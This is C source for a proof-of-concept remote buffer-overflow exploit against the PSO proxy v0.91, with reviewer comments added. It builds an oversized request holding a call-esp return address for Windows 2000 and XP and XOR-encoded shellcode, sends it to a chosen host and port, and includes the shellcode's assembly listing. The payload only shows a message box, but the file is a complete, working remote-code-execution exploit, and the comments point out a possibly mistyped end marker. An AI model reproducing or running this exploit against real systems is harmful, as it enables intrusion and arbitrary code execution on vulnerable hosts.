/************************************************************\
* PSO v0.91 PoC - Proof of Concept code *
* by NoRpiUs *
* *
* *
* web: www.norpius.tk *
* email: norpius@altervista.org *
* Url del programma: http://psoproxy.sourceforge.net *
* *
\************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include <windows.h>
#define close closesocket
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif
/*
 * Return address written at offset 1024 of the request (see main), chosen per
 * target from the usage menu. Each is the little-endian encoding of one
 * address: 0x717564B8 for the "Win 2K ITA" target, 0x77351CC1 for
 * "Win XP ITA". The macro names say each points at a `call esp`, which would
 * presumably pass control to the bytes that follow the overwritten return
 * address on the stack; the addresses themselves cannot be verified from
 * this file.
 */
#define CALL_ESP_2K "\xB8\x64\x75\x71"
#define CALL_ESP_XP "\xC1\x1C\x35\x77"
/*
 * Payload copied to offset 1040 of the request (see main).
 *
 * Layout, as far as the bytes show:
 *  - bytes 0..21 (the first line plus the 5-byte call that opens the second):
 *    a small decoder. `jmp short` forward to a `call` back, whose return
 *    address (the first encoded byte) is popped into eax; then a loop that
 *    XORs the byte at eax with 0x80, increments eax, and stops when the
 *    dword at eax equals "hack" (cmp dword [eax], 0x6B636168); finally a
 *    `jmp short` over the call into the decoded code.
 *  - the rest: the MessageBoxA / ExitProcess stub from the assembly listing at
 *    the end of this file, stored XOR 0x80.
 *  - trailer: the end marker, a 0x90, and "\r\n".
 *
 * NOTE(review): the trailer is written "\x68\x61s\x63\x6B", i.e. the bytes
 * 68 61 73 63 6B ("hasck"). The decoder compares against "hack"
 * (68 61 63 6B), which does not occur as a dword anywhere in that trailer, so
 * as transcribed the decode loop would not stop at this marker. Whether the
 * extra 's' is a transcription error or deliberate cannot be told from this
 * file -- confirm against the original before relying on it.
 *
 * The array is a C string, so sizeof(shellcode) includes the implicit NUL;
 * main copies that many bytes.
 */
char shellcode[] =
// XOR-encoded with 0x80 :)
// Pops up a MessageBoxA reading "NoRpiUs w4s h3r3"
"\xEB\x0F\x58\x80\x30\x80\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05"
"\xE8\xEC\xFF\xFF\xFF\x6B\xB8\xDF\x0D\xF7\xB6\xD6\x7F\x95\xEC\x30\xC1"
"\x80\x0D\xF7\x8D\xD6\xD0\x7F\x95\x5C\x30\xC1\x80\x0D\xF7\x99\x0D\xDF"
"\xC1\xB1\x49\xD1\xD3\xD6\xD1\x7F\x50\xD7\x7F\x95\xEC\x30\xC1\x80\x0D"
"\xF7\xAA\xD6\xD0\x7F\x95\x5C\x30\xC1\x80\x7F\x50\x68\x43\x7F\x7F\x7F"
"\xEB\xE5\xF2\xEE\xE5\xEC\xB3\xB2\xAE\xE4\xEC\xEC\x80\xCD\xE5\xF3\xF3"
"\xE1\xE7\xE5\xC2\xEF\xF8\xC1\x80\xCE\xEF\xD2\xF0\xE9\xD5\xF3\xA0\xF7"
"\xB4\xF3\xA0\xE8\xB3\xF2\xB3\x80\xC5\xF8\xE9\xF4\xD0\xF2\xEF\xE3\xE5"
"\xF3\xF3\x80\xF5\xF3\xE5\xF2\xB3\xB2\xAE\xE4\xEC\xEC\x80\xBA\xA9\x80"
// end marker (see the NOTE above), a 0x90, and the "\r\n" line terminator
"\x68\x61s\x63\x6B\x90\r\n";
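/*
 * Print a diagnostic and terminate the process with exit status 1.
 *
 * err: the complete message to print, including any trailing newline.
 *      It is written to stderr (the original wrote it to stdout, mixing it
 *      into the buffered progress output) and is never used as a format
 *      string. A NULL message is tolerated and prints nothing.
 * Never returns.
 */
void errore( const char *err )
{
    if (err != NULL)
        fputs(err, stderr);
    exit(1);
}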
/*
 * Print the tool's identification banner to stdout.
 * The text is the same as before; it is simply emitted one line at a time
 * from a table instead of as a single concatenated literal.
 */
void banner(void)
{
    static const char *const lines[] = {
        "\n\tPSO PoC\n",
        "\tBy NoRpiUs\n",
        "\tweb: www.norpius.tk\n",
        "\temail: norpius@altervista.org\n\n",
    };
    size_t i;

    for (i = 0; i < sizeof(lines) / sizeof(lines[0]); i++) {
        fputs(lines[i], stdout);
    }
}
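/*
 * Print the usage text and terminate with exit status 1.
 *
 * progz: the program name (main passes argv[0]). It was accepted but never
 *        used, so the usage line did not show how to invoke the tool; it is
 *        now printed. A NULL or empty progz (argc == 0) falls back to a
 *        generic name so nothing is dereferenced.
 * Never returns.
 */
void uso( char *progz )
{
    const char *name = (progz != NULL && progz[0] != '\0') ? progz : "pso";

    fprintf(stdout, "\tUso: %s <host> <porta> <target>\n\n", name);
    fputs("\tTarget: \n"
          "\t1 = Win 2K ITA \n"
          "\t2 = Win XP ITA \n", stdout);
    exit(1);
}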
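/* Layout of the request put on the wire (offsets in bytes). */
enum {
    EVIL_LEN = 1530,     /* total bytes sent */
    RET_OFFSET = 1024,   /* where the 4-byte return address is written */
    SC_OFFSET = 1040,    /* where the shellcode (plus its NUL) is copied */
    PAD_BYTE = 0x41      /* filler for every byte not otherwise set */
};

/*
 * Parse a decimal TCP port from s.
 * Returns the port (1..65535), or -1 if s is NULL, empty, not entirely
 * numeric, or out of range. Replaces atoi(), which silently turned junk
 * into port 0.
 */
static int parse_port(const char *s)
{
    char *end = NULL;
    long v;

    if (s == NULL || *s == '\0')
        return -1;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || v < 1 || v > 65535)
        return -1;
    return (int)v;
}

/*
 * Send all len bytes of buf on sock, continuing after short writes.
 * Returns 0 on success, -1 if send() fails or reports no progress.
 */
static int send_all(int sock, const unsigned char *buf, size_t len)
{
    size_t done = 0;

    while (done < len) {
        int n = (int)send(sock, (const char *)buf + done, len - done, 0);
        if (n <= 0)
            return -1;
        done += (size_t)n;
    }
    return 0;
}

/*
 * Entry point: build the oversized request and send it to <host>:<porta>.
 *
 * argv[1] host, argv[2] TCP port, argv[3] target id ('1' = Win 2K ITA,
 * '2' = Win XP ITA); only the first character of argv[3] is examined, as
 * before. Prints progress to stdout; any failure is reported via errore(),
 * which exits with status 1.
 *
 * Fixes over the original:
 *  - argv[3] is read, so four arguments are required (`argc < 3` let a
 *    three-argument run dereference NULL);
 *  - the whole buffer is initialised: only the first 1040 bytes were, so the
 *    tail past the shellcode was uninitialised stack memory sent to the peer;
 *  - the port is validated, the resolved address is checked to be IPv4 and
 *    the sockaddr is zeroed, WSAStartup() and short send() results are
 *    checked, and the socket is closed on every path.
 */
int main( int argc, char *argv[] )
{
    int sock;
    int port;
    struct hostent *he;
    struct sockaddr_in target;
    unsigned char evilbuff[EVIL_LEN];
#ifdef WIN32
    WSADATA wsadata;
    if (WSAStartup(MAKEWORD(2,0), &wsadata) != 0)
        errore("\t[-] WSAStartup fallito\n");
#endif
    banner();
    if ( argc < 4 ) uso(argv[0]);

    port = parse_port(argv[2]);
    if (port < 0)
        errore("\t[-] Porta non valida\n");

    /* gethostbyname() is obsolete but kept to stay close to the original;
     * only an IPv4 answer fits in sockaddr_in. */
    if ( (he = gethostbyname(argv[1])) == NULL )
        errore("\t[-] Impossibile risolvere l'host\n");
    if (he->h_addrtype != AF_INET
        || he->h_length != (int)sizeof(struct in_addr)
        || he->h_addr_list[0] == NULL)
        errore("\t[-] L'host non ha un indirizzo IPv4\n");

    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    memcpy(&target.sin_addr, he->h_addr_list[0], sizeof(target.sin_addr));
    target.sin_port = htons((unsigned short)port);

    fputs("\t[+] Preparazione del buffer...\n", stdout);
    /* Pad everything first, then overlay the return address and payload. */
    memset(evilbuff, PAD_BYTE, sizeof(evilbuff));
    switch(argv[3][0])
    {
    case '1': memcpy(evilbuff + RET_OFFSET, CALL_ESP_2K, 4); break;
    case '2': memcpy(evilbuff + RET_OFFSET, CALL_ESP_XP, 4); break;
    default : errore("\t[-] Target sbagliato\n");
    }
    /* sizeof(shellcode) includes the terminating NUL, exactly as before. */
    if (SC_OFFSET + sizeof(shellcode) > sizeof(evilbuff))
        errore("\t[-] Shellcode troppo lungo per il buffer\n");
    memcpy(evilbuff + SC_OFFSET, shellcode, sizeof(shellcode));

    fputs("\t[+] Connessione...\n", stdout);
    /* On Win32 socket() returns INVALID_SOCKET, which the int conversion
     * turns into -1, so the `< 0` test holds there too (as in the original). */
    if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0 )
        errore("\t[-] Impossibile creare socket\n");
    if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 ) {
        close(sock);
        errore("\t[-] Connessione fallita\n");
    }
    if ( send_all(sock, evilbuff, sizeof(evilbuff)) < 0 ) {
        close(sock);
        errore("\t[-] Impossibile spedire il buffer\n");
    }
    close(sock);
#ifdef WIN32
    WSACleanup();
#endif
    fputs("\t[+] Buffer spedito!\n", stdout);
    fputs("\t[+] Ora la MessageBox dovrebbe essere apparsa :)\n\n", stdout);
    return(0);
}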
/***************** SHELLCODE *******************\
;This shellcode works on both targets without OS-version-specific addresses:
;it reaches LoadLibraryA and GetProcAddress through two fixed addresses inside
;the PSO image (0041b06ch / 0041b0dch, presumably its import table) rather
;than through hard-coded kernel32 addresses.
BITS 32
jmp short data
next:
pop edi
lea esi, [edi+54]
push esi
call [0041b06ch] ;LoadLibraryA("user32.dll")
lea esi, [edi+13]
push esi
push eax
call [0041b0dch] ;GetProcAddress(user32.dll, "MessageBoxA")
lea esi, [edi+25]
lea ebx, [edi+65] ;":)" follows the 11-byte "user32.dll",0 at +54 (encoded bytes 8D 5F 41)
xor ecx, ecx
push ecx
push ebx ;lpCaption ":)" (the encoded bytes are 53 56: ebx is pushed before esi)
push esi ;lpText "NoRpiUs w4s h3r3"
push ecx
call eax ;MessageBoxA(0, "NoRpiUs w4s h3r3", ":)", MB_OK)
push edi
call [0041b06ch] ;LoadLibraryA("kernel32.dll")
lea esi, [edi+42]
push esi
push eax
call [0041b0dch] ;GetProcAddress(kernel32.dll, "ExitProcess")
call eax ;ExitProcess -- no exit code is pushed, so the argument is whatever is on top of the stack
data:
call next
db 'kernel32.dll',0 ; +0 bytes
db 'MessageBoxA',0 ; +13 bytes
db 'NoRpiUs w4s h3r3',0 ; +25 bytes
db 'ExitProcess',0 ; +42 bytes
db 'user32.dll',0 ; +54 bytes
db ':)',0 ; +65 bytes
\***************** END SHELLCODE ***************/
|